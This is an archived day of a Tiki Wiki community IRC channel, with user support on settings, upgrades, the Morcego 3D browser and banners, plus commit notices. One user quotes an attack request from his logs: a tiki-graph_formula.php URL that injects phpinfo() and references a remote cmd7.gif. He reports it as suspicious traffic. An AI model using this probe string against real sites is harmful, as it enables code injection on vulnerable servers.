←Prev date Next date→ Show only urls(Click on time to select a line by its url)

WhoWhatWhen
***Caarrie|away is now known as Caarrie [00:00]
spoonypjkits a front page announcement..
the post is http://info.tikiwiki.org/tiki-read_article.php?articleId=52
[00:01]
ComnenusIt wasn't then [00:01]
spoonypjkah [00:01]
ComnenusI don't think it was out for a day. [00:02]
***nkoth3 has quit IRC (Read error: 110 (Connection timed out)) [00:06]
.... (idle for 17mn)
Comnenus has quit IRC ("http://www.mibbit.com ajax IRC Client") [00:23]
danopia` has quit IRC ("2b||!2b") [00:30]
.... (idle for 19mn)
PrezKennedyIII has quit IRC ("Leaving") [00:49]
PrezKennedy has joined #tikiwiki
Caarrie is now known as Caarrie|away
[00:59]
.... (idle for 17mn)
Caarrie|away is now known as Caarrie [01:17]
.......... (idle for 45mn)
nkoth3 has joined #tikiwiki
nkoth3__ has joined #tikiwiki
voraistos has joined #tikiwiki
[02:02]
voraistospolom
How is the default menu (id 42) generated in tiki ?
[02:07]
***nkoth3_ has quit IRC (Read error: 110 (Connection timed out))
nkoth3 has quit IRC (Read error: 110 (Connection timed out))
[02:18]
Caarrie is now known as Caarrie|sleeping [02:29]
marclaportevia tiki.sql
in installer
[02:41]
.... (idle for 17mn)
***marclaporte has quit IRC ("Miranda IM! Smaller, Faster, Easier. http://miranda-im.org") [02:58]
.... (idle for 15mn)
vkumar has joined #tikiwiki [03:13]
vkumarhi everybody..
hi luminoso
[03:14]
.... (idle for 15mn)
***PrezKennedy has quit IRC ("Leaving") [03:30]
navster-mobile has joined #tikiwiki
navster-mobile has quit IRC (Client Quit)
[03:44]
SEWilco2 has quit IRC (Remote closed the connection) [03:51]
..... (idle for 20mn)
vkumar has quit IRC ("http://www.mibbit.com ajax IRC Client")
PrezKennedy has joined #tikiwiki
[04:11]
..... (idle for 24mn)
javacougar has joined #tikiwiki [04:38]
javacougarDoes anyone know how I can have my wiki pages display the date they were last modified and by whom? [04:39]
voraistosjavacougar I'm not sure, but I think feature contribution is what you're looking for [04:45]
nkoth3__javacougar: doesn't it normally display at the bottom? [04:48]
javacougarIt isn't showing on my install...Perhaps it is based in the theme? I am using the mediawiki theme. Any idea where the setting might be? [04:49]
voraistosno it doesn't normally display at the bottom. there are various types of contrib display you can get: last contributor, all contributors, etc... [04:52]
nkoth3__right--- where is that setting?
Admin... Wiki: List Authors dropdown?
[04:52]
voraistosadmin.php?page=wiki
err.. no
tiki-admin
and in tiki2 I'm not sure you can get?page=wiki working
admin panel>wiki settings > wiki features > list authors
[04:53]
javacougarI see that option, testing now [04:55]
voraistoswhat you want is probably "last modified on" [04:55]
javacougarI have that selected, but it does not seem to be doing anything [04:58]
nkoth3__maybe it is the mediawiki theme. I remember that it is right at the bottom....
like really at the bottom, in the footer practically for that theme
Maybe the "footer" needs to be activated in the Look and Feel
[04:59]
javacougarI guess I should enable the footer and see if its there [04:59]
nkoth3__Beyond that, I have no clue - i haven't tested the mediawiki theme on the latest tiki, to be honest
Maybe chibaguy might know, but he is not online right now
[04:59]
javacougarah yes, its at the top of the footer
thanks for your help folks
[05:00]
nkoth3__np [05:00]
voraistosNever looked at at, but the mediatiki theme probably has a great deal of hacked-up .tpls [05:01]
nkoth3__a couple I remember
a handful
[05:02]
javacougarIt's quite different from the standard templates...a few surprises along the way...but overall its been pretty good [05:03]
***navster has joined #tikiwiki [05:09]
danopia has quit IRC (Read error: 104 (Connection reset by peer)) [05:16]
.... (idle for 16mn)
javacougar has quit IRC ("CGI:IRC (EOF)") [05:32]
.... (idle for 18mn)
Lucymoz has quit IRC (Read error: 110 (Connection timed out))
tanjir has quit IRC (Read error: 110 (Connection timed out))
marclaporte has joined #tikiwiki
[05:50]
voraistoshey can you gys help me?
I just can't manage to find how the forms are built in tiki
for example in tiki-admin.php
tiki-admin.php?page=wiki sorry
I can change the features, then "set the features"
in the html I can find what's going on...
in the php and tpl's I can't
I just can't find where it says: " <form action="tiki-admin.php?page=wiki" method="post"> "
marclaporte ?
[05:54]
marclaportepolom [05:59]
voraistospolom :D [05:59]
marclaportewhat are you trying to do? [05:59]
voraistosoh and thanks btw for earlier
I'm trying to hack the hell out of tiki :D
[05:59]
marclaporteyay! [05:59]
voraistoslearning tiki and php at the same time [05:59]
marclaportetiki-admin-include-*.php [05:59]
voraistosI don't think so
I've looked at the wiki include
it's not there
or I'm blind :O
[06:00]
marclaportewhat are you changing? [06:01]
voraistosthe naming of the files
I tried that for the wiki itself, and got into trouble (editpage is massive)
so I decided to try it out with the admin interface
basically, what was once called tiki-admin.php is now called just admin.php
getting all the php files moved/linked together isn't the problem, all pages display fine
changing the features is the problem
because i can't find the piece of code that deals with the forms
hey, do you know any tool that can search for stuff in many source code files?
[06:02]
Sug4rSug4r you know any tool that can search for stuff in many source code files? [06:07]
voraistoswtf ?
it seems my desktop search thing doesn't work
[06:08]
marclaporteI still don't understand what you are trying to fix/change [06:09]
voraistosoriginally, (tiki3), the main admin panel file is called tiki-admin.php
Let's say that I don't like the name and want to change it.
to... admin.php
all the links I could find were changed to admin.php
admin.php?page=wiki diplays the wiki option/features
and, after changes the links to admin.php, everything displays fine
except, when i want to change an option and save, the "save" button is a post form that links to tiki-admin.php
because tiki-admin.php doesn't exist it doesn't work
I want to find where in the code the form is being processed.
[06:12]
marclaporteah [06:16]
voraistosI found some forms in the admin-include stuff
but not the wiki one
[06:16]
***marclaporte has quit IRC (Read error: 104 (Connection reset by peer)) [06:18]
voraistos...
alright I apologize
fuck knows why, I couldn't find it before, when it is in the right file right in front of my nose
[06:18]
***rlopez_ has joined #tikiwiki [06:24]
CIA-46tikiwiki: 03pkdille * r17956 10/branches/3.0/lang/ (35 files in 35 dirs): [LANG] get_strings on all language files [06:37]
***marclaporte has joined #tikiwiki
avizion has quit IRC ("reinstall, brb")
[06:40]
.... (idle for 19mn)
voraistoshey marclaporte I don't know why, what I was looking for was right where expectable, I guess lack of sleep did blind me after all ;) [07:01]
marclaportehehe
blaming lack of sleep seems most strategic
[07:05]
........ (idle for 37mn)
***DawnLight1 has joined #tikiwiki [07:45]
DawnLight1hello. why does wget when it saves gallery files doesn't give them their correct file names as firefox does, but gives them their url's as names? [07:46]
***DawnLight1 has left [08:00]
.... (idle for 15mn)
mycomputer has joined #tikiwiki [08:15]
navster has quit IRC () [08:27]
.... (idle for 16mn)
marclaporte has quit IRC (Read error: 110 (Connection timed out)) [08:43]
.... (idle for 18mn)
arunreddy has joined #tikiwiki [09:01]
senthil has joined #tikiwiki
arunreddy has left "Leaving"
[09:07]
senthilhi i have configured tikiwiki, but some men's are not listed in the left pane
and pls tell me how to set the theme...
[09:08]
***senthil has quit IRC (Client Quit)
senthil has joined #tikiwiki
[09:10]
senthilhi] [09:11]
***vkumar has joined #tikiwiki
vkumar has quit IRC (Client Quit)
[09:20]
..... (idle for 24mn)
chibaguy has joined #tikiwiki [09:48]
CIA-46tikiwiki: 03chibaguy * r17957 10/branches/3.0/styles/tikinewt.css: [FIX] Horizontal PHP Layers menu padding and border on right side of item. [09:59]
***senthil has quit IRC ("CGI:IRC (EOF)") [10:12]
....... (idle for 31mn)
vkumar has joined #tikiwiki [10:43]
vkumarhi gary.. good evening [10:44]
***Caarrie|sleeping is now known as Caarrie
vkumar has quit IRC ("http://www.mibbit.com ajax IRC Client")
vkumar has joined #tikiwiki
[10:48]
vkumar has quit IRC ("http://www.mibbit.com ajax IRC Client") [11:01]
....... (idle for 30mn)
MangaPower has joined #tikiwiki [11:31]
....... (idle for 30mn)
danopia` has joined #tikiwiki
danopia`xchat has joined #tikiwiki
axold has joined #tikiwiki
[12:01]
........ (idle for 36mn)
spoonypjknow the only decision left to make is what brand knife do I throw myself onto. [12:39]
***axold has quit IRC ("Saliendo") [12:48]
CIA-46tikiwiki: 03chibaguy * r17958 10/branches/3.0/styles/ (darkroom.css thenews.css): [ENH] A little padding in table.normal td (as for example in view tracker). [12:49]
***nkoth3__ has quit IRC () [12:56]
.... (idle for 17mn)
marclaporte has joined #tikiwiki
danopia`xchat has quit IRC ("2b||!2b")
[13:13]
......... (idle for 44mn)
s0nix has quit IRC (lindbohm.freenode.net irc.freenode.net)
amette has quit IRC (lindbohm.freenode.net irc.freenode.net)
s0nix` has joined #tikiwiki
amette has joined #tikiwiki
[13:58]
chibaguy has quit IRC ("http://www.mibbit.com ajax IRC Client") [14:03]
navster has joined #tikiwiki
SEWilco2 has joined #tikiwiki
[14:10]
marclaporte has quit IRC (Read error: 104 (Connection reset by peer))
FrankP_german has joined #tikiwiki
[14:16]
...... (idle for 26mn)
xavi has joined #tikiwiki [14:44]
xavihi all
I'm interested in using Banners on a tiki site, but they are aparently half-broken on tiki 2.x and 3.x
[14:44]
rlopez_hi xavi [14:45]
xavianybody here having banners working fine?
hi rlopez_! :-)
[14:45]
rlopez_xavi we have started with the workspaces project (again)
wondering whether you will be in the testing team
[14:53]
xavinope, sorry
I'm still with many things to finish...
like the book cahpter about wikis in education in Spain for you mate at UAH, ...
plus my students work, ...
Maybe in some months time, during summer time?
[14:54]
rlopez_sure
testing stage hopefully will start on august
:)
but time flies
[14:56]
***Comnenus has joined #tikiwiki [15:00]
ComnenusMorning. [15:00]
xavievening Comnenus [15:02]
Comnenusthe 2.3 to 2.4 increment has a README that says to check INSTALL but there is no INSTALL. The upgrade pages I've found on doc.two are from 1.9 -> 2.x, etc.. Not a minor upgrade. Any input?
xavi: afternoon in an hour =X
[15:02]
xavi:-)
dowload the full install 2.4, and reada the install there, then
but in short: unzip, and copy those files over your 2.3
and no database changes needed
[15:02]
ComnenusDo I need to run tiki-setup again? [15:03]
CIA-46tikiwiki: 03sylvieg * r17959 10/branches/3.0/lib/banners/bannerlib.php: notice [15:03]
xaviComnenus: no, just delete your tiki caches, just in case [15:05]
Comnenuscool. trying now. [15:05]
xaviComnenus: could you plase update the documentation so that it's clearer for others haveing the same doubt you had? [15:06]
***axold has joined #tikiwiki [15:07]
Comnenusxavi: I can do that?
xavi: Sure. Once I make sure the way I'm doing it works, I will.
[15:08]
***rodrigo_sampaio has joined #tikiwiki
danopia` is now known as danopia
[15:08]
xaviComnenus: not only you can, but you are very welcome to do it! :-)
rodrigo_sampaio: hi. TOday I can test morcego and send you whatever log you need to test it's back working on tiki sites :-)
rodrigo_sampaio: ...provided you tell me which file you need from the server (I'm not very experienced sys admin :-/ )
[15:12]
rodrigo_sampaioxavi: that is great! I think I have time to look at this this week with your feedback [15:13]
xaviok [15:14]
rodrigo_sampaioxavi: I think I've send you in the last email the file I need [15:14]
xaviit'll be great to have morcego back working in the coming 3.0 release :-) [15:14]
rodrigo_sampaio:) [15:14]
xavirodrigo_sampaio: ok, I'll check that last email [15:14]
rodrigo_sampaioxavi: actually, I think it is back and you can't use because of a misconfiguration on your server [15:15]
xaviok, ok, I'll check that, then, on different servers
just in case
[15:15]
rodrigo_sampaioxavi: I might be wrong but morcego is working in tiki 3.0 on my devel machine [15:15]
***marclaporte has joined #tikiwiki [15:16]
xavirodrigo_sampaio: do you know if from cpanel you can get those apache logs you need? [15:16]
rodrigo_sampaioxavi: no idea, i never touched on cpanel :) [15:16]
xaviok :-) [15:16]
rodrigo_sampaiobut i think so [15:16]
xavithe customer who want morcego working on their site only has cpanel access, afaik (and ftp)
I'll have a look (I'm not experience cpanel user either)
and if not, I'll try to reproduce on any site where I have access to apache logs, etc.
[15:17]
rodrigo_sampaioxavi: ok [15:18]
Comnenusxavi: is there a way to test if it's actually using the 2.4 changes? [15:20]
xavicheck if your files from the 2.3 to 2.4 compressed file, are in the server. if they are, then you are running 2.4 version
sometimes there is a .timestamp file, but not always (I don't know why)
or when and when not that file .timestamp is in there, bt it's handy, indeed
when it's in there
[15:21]
CIA-46tikiwiki: 03sylvieg * r17960 10/branches/3.0/templates/tiki-site_header.tpl: [FIX]banner: site banner are not depending on custom code when no logo [15:23]
xavirodrigo_sampaio: mmm, what was needed to have morcego working? I?m atempting to test it on doc.tw.o (running 3.0), anvd I see that the feature is enabled at Admin > Features, but icon not shown on wiki pages... [15:25]
***Caarrie is now known as Caarrie|away [15:25]
rodrigo_sampaioxavi: strange... maybe doc.tw.org has a template that does not include the morcego icon? [15:26]
Comnenusxavi: would it be tikiwiki-2.3.tar ? [15:26]
rodrigo_sampaioxavi: ohh... there are two features that need to be enable :( [15:26]
xavixavi is reading the documentation about Wiki 3D browser, to avoid bothering morcego coders if not needed ;-) [15:27]
rodrigo_sampaioxavi: feature_morcego and wiki_feature_3d [15:27]
xaviand "XMLRPC API" is enabled in Admin >Features. ", according to the documentation
!
[15:27]
sylviegbtw is the site http://morcego.arca.ime.usp.br/tiki-index.php working? [15:28]
xavihttp://doc.tikiwiki.org/tiki-index.php?page=Wiki+3D [15:28]
rodrigo_sampaiorodrigo_sampaio trust luis fagundes (main morcego developer) to write code not to write docs :) [15:28]
Comnenusxavi: don't see anything like that...there isnt a page I need to go to or a script to run? [15:28]
rodrigo_sampaiosylvieg: yeah [15:29]
xaviComnenus, no. if you uploaded the new files (2.3 to 2.4) it's fine enough. [15:29]
Comnenusxavi: I uploaded the incremental...should I have uploaded the full 2.4? [15:30]
sylviegrodrigo_sampaio: not working for me in FF and IE7 - what browserdo you use? [15:30]
xaviComnenus: it's ok with the incremental [15:30]
rodrigo_sampaiosylvieg: i use ff on linux [15:30]
***batawata has joined #tikiwiki [15:30]
rodrigo_sampaiosylvieg: i think that morcego does not work with 64bits [15:30]
batawatahey [15:30]
xavibatawata around! hi! :-) [15:31]
sylviegoh strange why do I have a blank left div... [15:31]
rodrigo_sampaiosylvieg: your system is 64bits? [15:31]
batawatatheorically morcego should work with 64bits, but sun's java does not [15:31]
sylviegrodrigo_sampaio: .. I am on 64bits
hello batawata
[15:31]
batawatasince I put 64 linux here I couldn't see it properly (it appears in a very small square instead of whole div at http://morcego.arca.ime.usp.br) [15:31]
rodrigo_sampaioat home a have a 64bits machine and i get the same blank left div [15:31]
batawatahi xavi! hi sylvieg! :-) [15:32]
xavisylvieg: I had the same issue on linux 64 bits. Nowadays I'm visiting that page from a Linux 32bits and it's working fine for me: http://morcego.arca.ime.usp.br/tiki-index.php [15:33]
sylviegxavi: banner in header working for me on 2 but not in 3.... [15:34]
batawatathat's the problem with java :-(. I wonder if now flash would be able to do all the math needed for morcego (by the time I developed it, the engine would hang with so much calculation) [15:35]
***Amorphous has quit IRC (Read error: 110 (Connection timed out))
Amorphous has joined #tikiwiki
[15:37]
xavisylvieg, not for me on 2.x in header. Can you tell me some setttings/image to try? or you can register/log in at the site I've told you if you want to reproduce the problem in the 2.x site I told you
batawata and rodrigo_sampaio: I've updated the page http://doc.tikiwiki.org/Wiki+3D
however, I can't find the equivalent setting in 3.0 under "Admin > Wiki". Where is it?
we could leave morcego working on doc.tw.o... that's what I'm attempting in fact, but unsuccessfully yet
batawata and rodrigo_sampaio : ^?
batawata and rodrigo_sampaio: which style should I use on doc.tw.o to see the icons?... or where is the missing setting at Admin > Wiki? (if needed)
[15:40]
batawataxavi: rodrigo_sampaio is having lunch and will brb. I need to check the admin and test to reply, can't do it right now [15:48]
xaviah, ok, sorry, thanks for reply [15:49]
batawatano prob :-) [15:49]
***nevali has joined #tikiwiki
nevali has quit IRC (Remote closed the connection)
mat2 has joined #tikiwiki
mat2 has left
[15:54]
navster has quit IRC (Client Quit) [16:07]
axoldhi guys [16:08]
xavihi axold [16:09]
CIA-46tikiwiki: 03sylvieg * r17961 10/branches/3.0/lib/banners/bannerlib.php: [FIX]banner: default maxClicks in db has been set to NULL :-( [16:10]
***snarlydwarf has joined #tikiwiki [16:10]
...... (idle for 29mn)
rodrigo_sampaioxavi: I think that someone changed the tiki-admin-include-wiki.tpl. on tiki30 the option to enable wiki_feature_3d is missing
xavi: if you want to test you can enable it directly in the database
[16:39]
xaviok. Can you add it back, please, before the next 3.0beta4 (in two weeks, I think)? [16:40]
rodrigo_sampaioxavi: yeah, i think so [16:41]
xaviok, rodrigo_sampaio, I'll also test adding that one to the db in my local, to test. what was the parameter to add to the db table tiki_preferences? [16:41]
sylviegwiki_feature_3d [16:44]
***Caarrie|away is now known as Caarrie [16:44]
rodrigo_sampaioxavi: the preference name is wiki_feature_3d and you have to set the value to 'y' [16:45]
xaviok [16:45]
sylviegricks seems to have lost all the wiki3d setting... [16:48]
***rlopez_ has quit IRC (Remote closed the connection) [16:49]
xavihey! magic did the trick!
:-)
[16:52]
***MangaPower has quit IRC ("ChatZilla 0.9.84 [Firefox 3.0.8/2009032609]") [16:52]
xavirodrigo_sampaio , batawata and sylvieg: thanks to "magic" admin panel, I was able to re-enable morcego on doc.tw.o, and it's working for me nicely!!! :-)
can you confirm, sylvieg? example: http://doc.tikiwiki.org/tiki-index.php?page=Banners
[16:53]
sylviegconfirm what? [16:54]
xavithat it's working for you at doc.tw.o (morcego) [16:54]
sylviegno I have a white screen because I am 64bits [16:55]
xavimmm, ok, I use to see it smaller on the 64 bit machine, at the page from arca. Anyway, in 32 bits, it's back working on 3.0 sites
Then, I'll keep up searching why it¡'s not working on 2.x sites.
[16:55]
***danopia is now known as danopia`xchat [16:58]
rodrigo_sampaioxavi: I confirm it is working on doc.tw
xavi: as far as I remember the problema with 2.0 is the .htaccess
[16:58]
xavirodrigo_sampaio: thanks. however, when I click on a node, the page of that node is not loaded to me [16:59]
rodrigo_sampaioxavi: the same here [17:00]
***GillesM has joined #tikiwiki [17:00]
xavishouldn't it be loaded?
(it use to be loaded, afair)
[17:00]
rodrigo_sampaioxavi: i think so, not sure. this we have to ask to batawata and he is not here at the moment [17:01]
xaviok [17:01]
***nkoth3 has joined #tikiwiki [17:01]
xaviand rodrigo_sampaio: has freetag 3D browsing something to do with morcego?
I enabled that also in 3.0, but it's showing a blank section on the page. Example: http://doc.tikiwiki.org/tiki-browse_freetags.php?tag=plugin
[17:03]
***mycomputer has quit IRC ("Quitte")
danopia` has joined #tikiwiki
Lenny has joined #tikiwiki
[17:04]
rodrigo_sampaioxavi: i think it uses morcego, afair [17:08]
xavirodrigo_sampaio and batawata: confirmed: Morcego applet not working on freetag browsing to be, at doc.tw.o
rodrigo_sampaio: yes, confirmed (epiphany didn't tell me so, but FF confitrmed that clearly on the bottom bar)
s/to be/to me
[17:08]
***marclaporte has quit IRC (Read error: 110 (Connection timed out))
mib_01jfnl has joined #tikiwiki
[17:10]
xavirodrigo_sampaio: and yes, when you click on a node from the wiki 3d browsing window , that page is displayed on the tiki window: it's working fine [17:11]
Lennyoh, hello?
anybody knows where is Jonny Bradley? :S
[17:11]
xavirodrigo_sampaio: well, it's not working always fine to me, but it dd work once, at least, clicking on a node, It's not working again (lastest epiphany on linux)
Lenny: where? UK?
[17:13]
Lennyxavi: hehehehe, i thought he was online....
in fact he was online a minutes ago
[17:13]
xaviok :-) [17:14]
Lennythanks xavi ;) [17:15]
***FrankP_german has quit IRC ("Nettalk6 - www.ntalk.de") [17:15]
xavimmmm, rodrigo_sampaio and batawata: epiphany hanged (while browsing wiki paages at doc.tw.o), and when I closed all it's windows, I still had for some time an extra java window open in my computer. JavaEmbedded something... it's gone, now after 10-15seconds [17:20]
***danopia` is now known as danopia
danopia`xchat has quit IRC ("2b||!2b")
[17:30]
mib_01jfnl has quit IRC ("http://www.mibbit.com ajax IRC Client") [17:38]
xavianybody remembers how to make the "contact us" available for anonymous?
Comnenus: you can see the version of your tiki at: tiki-admin.php?page=general
about contact us for anonymous: I did enabled it at Admin > general, and enabled the contact us feature under admin > features. However, anonymous users just see the contact page with nothing on it.: http://tropicaldesign.org/wiki/tiki-contact.php
[17:49]
***batawata has left [17:50]
SEWilco2xavi: Looking at the code, apparently the contact form first tries the site contact user (did you define one in admin>General?) and then checks if the email address of user 'admin' is public. So I think either the site contact name, or else that of 'admin'. [18:03]
xavihi SEWilco2, and thanks for feedback.
That's buggy to me:
the "Contact us by email" should be shown, but it's not
Admin > general is set to allow anons to contact us; user is set as contact user, and that user has email
however, when you add the perm to anons for sending messags , then anon. user can see the form to send the message, and also the section showing the contact user's email address
to me, the contact user's email address should be shown even if no perm to send mesage through tiki is granted to anons.
That's the behavior that Tiki used to have
This is buggy in 2.4, afaik, then
rodrigo_sampaio: is GD needed for morcego to work?
That site with problems with morcego has no GD installed, afaik
[18:04]
rodrigo_sampaioxavi: i dont think so, im going to confirm that with batawata, just a sec [18:09]
xaviok [18:09]
rodrigo_sampaioxavi: morcego does not need gd [18:11]
xaviok [18:11]
..... (idle for 23mn)
***Comnenus has quit IRC ("http://www.mibbit.com ajax IRC Client") [18:34]
.... (idle for 16mn)
luminoso has quit IRC ("Leaving") [18:50]
luminoso has joined #tikiwiki
nkoth3_ has joined #tikiwiki
[18:55]
xavic u all. walk the dog time + dinner... [18:58]
***xavi has left [18:58]
nkoth3 has quit IRC (Read error: 110 (Connection timed out)) [19:10]
........ (idle for 37mn)
Lennyhi everybody.... [19:47]
luciashpolom [19:48]
Lenny...does somebody know what hour does Jonny Bradley connect? [19:48]
luciashLenny: i meet him usually during the UK day hours here [19:48]
Lennysorry, for the stalker question XD [19:48]
luciashLenny: from CZ [19:50]
***rlopez_ has joined #tikiwiki [19:52]
Lennywhen i read Lucia...i thought you were spanish xD [19:52]
luciashnp, when you read lucia... i expect you thought i'm female too :-p [19:56]
***Lucymoz has joined #tikiwiki
rlopez_ has quit IRC ("Leaving")
shawn-ffbh has joined #tikiwiki
[20:06]
..... (idle for 20mn)
ezrakatz has joined #tikiwiki [20:31]
CIA-46tikiwiki: 03pkdille * r17962 10/branches/3.0/lib/wiki-plugins/wikiplugin_trackerstat.php: [FIX] typo [20:37]
ezrakatzI've gotten several hits in the last week from someone trying to access "/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.classicjoke.com/mambots/cmd7.gif??". It seems like some sort of spam bot, but I'm not inclined to enable the feature to see what happens. This is probably an old bug, but I thought I'd throw it out here just in case it's something new. [20:43]
sylviegtiki-graph_formula was a security problem in old version - if I remember well [20:46]
***nkoth3 has joined #tikiwiki [20:47]
CIA-46tikiwiki: 03pkdille * r17963 10/branches/3.0/templates/ (tiki-admin-include-blogs.tpl tiki-webmail.tpl): [FIX] typo [20:52]
***rodrigo_sampaio has quit IRC ("Leaving.") [20:53]
nkoth3_ has quit IRC (Read error: 110 (Connection timed out))
Caarrie is now known as Caarrie|away
[21:00]
CIA-46tikiwiki: 03pkdille * r17964 10/branches/3.0/lang/fr/language.php: [MOD] some french translations [21:09]
***otrotabi has joined #tikiwiki [21:11]
otrotabihi there, I would like to store an url address in a tracker field and be able to click on the field and open the link stored there, is it possible ? [21:13]
...... (idle for 28mn)
***otrotabi has quit IRC ("CGI:IRC (EOF)") [21:41]
.......... (idle for 45mn)
SEWilco2I am amused by the concept of the tangent of phpinfo. :-) [22:26]
***SEWilco2 has quit IRC (Remote closed the connection) [22:27]
sylviegotrotabi use text area [22:29]
.... (idle for 17mn)
***rodrigo_sampaio has joined #tikiwiki
rodrigo_sampaio has quit IRC (Read error: 104 (Connection reset by peer))
rodrigo_sampaio has joined #tikiwiki
rodrigo_sampaio has quit IRC (Client Quit)
ezrakatz has quit IRC ()
[22:46]
...... (idle for 26mn)
GillesM has quit IRC (Read error: 104 (Connection reset by peer))
GillesM has joined #tikiwiki
[23:13]
nkoth3 has quit IRC () [23:21]
...... (idle for 26mn)
Caarrie|away is now known as Caarrie
GillesM has quit IRC (Read error: 104 (Connection reset by peer))
[23:47]
GillesM has joined #tikiwiki
marclaporte has joined #tikiwiki
snarlydwarf has quit IRC ("Ex-Chat")
axold has quit IRC (Remote closed the connection)
GillesM has quit IRC (Remote closed the connection)
GillesM has joined #tikiwiki
[23:52]

←Prev date Next date→ Show only urls(Click on time to select a line by its url)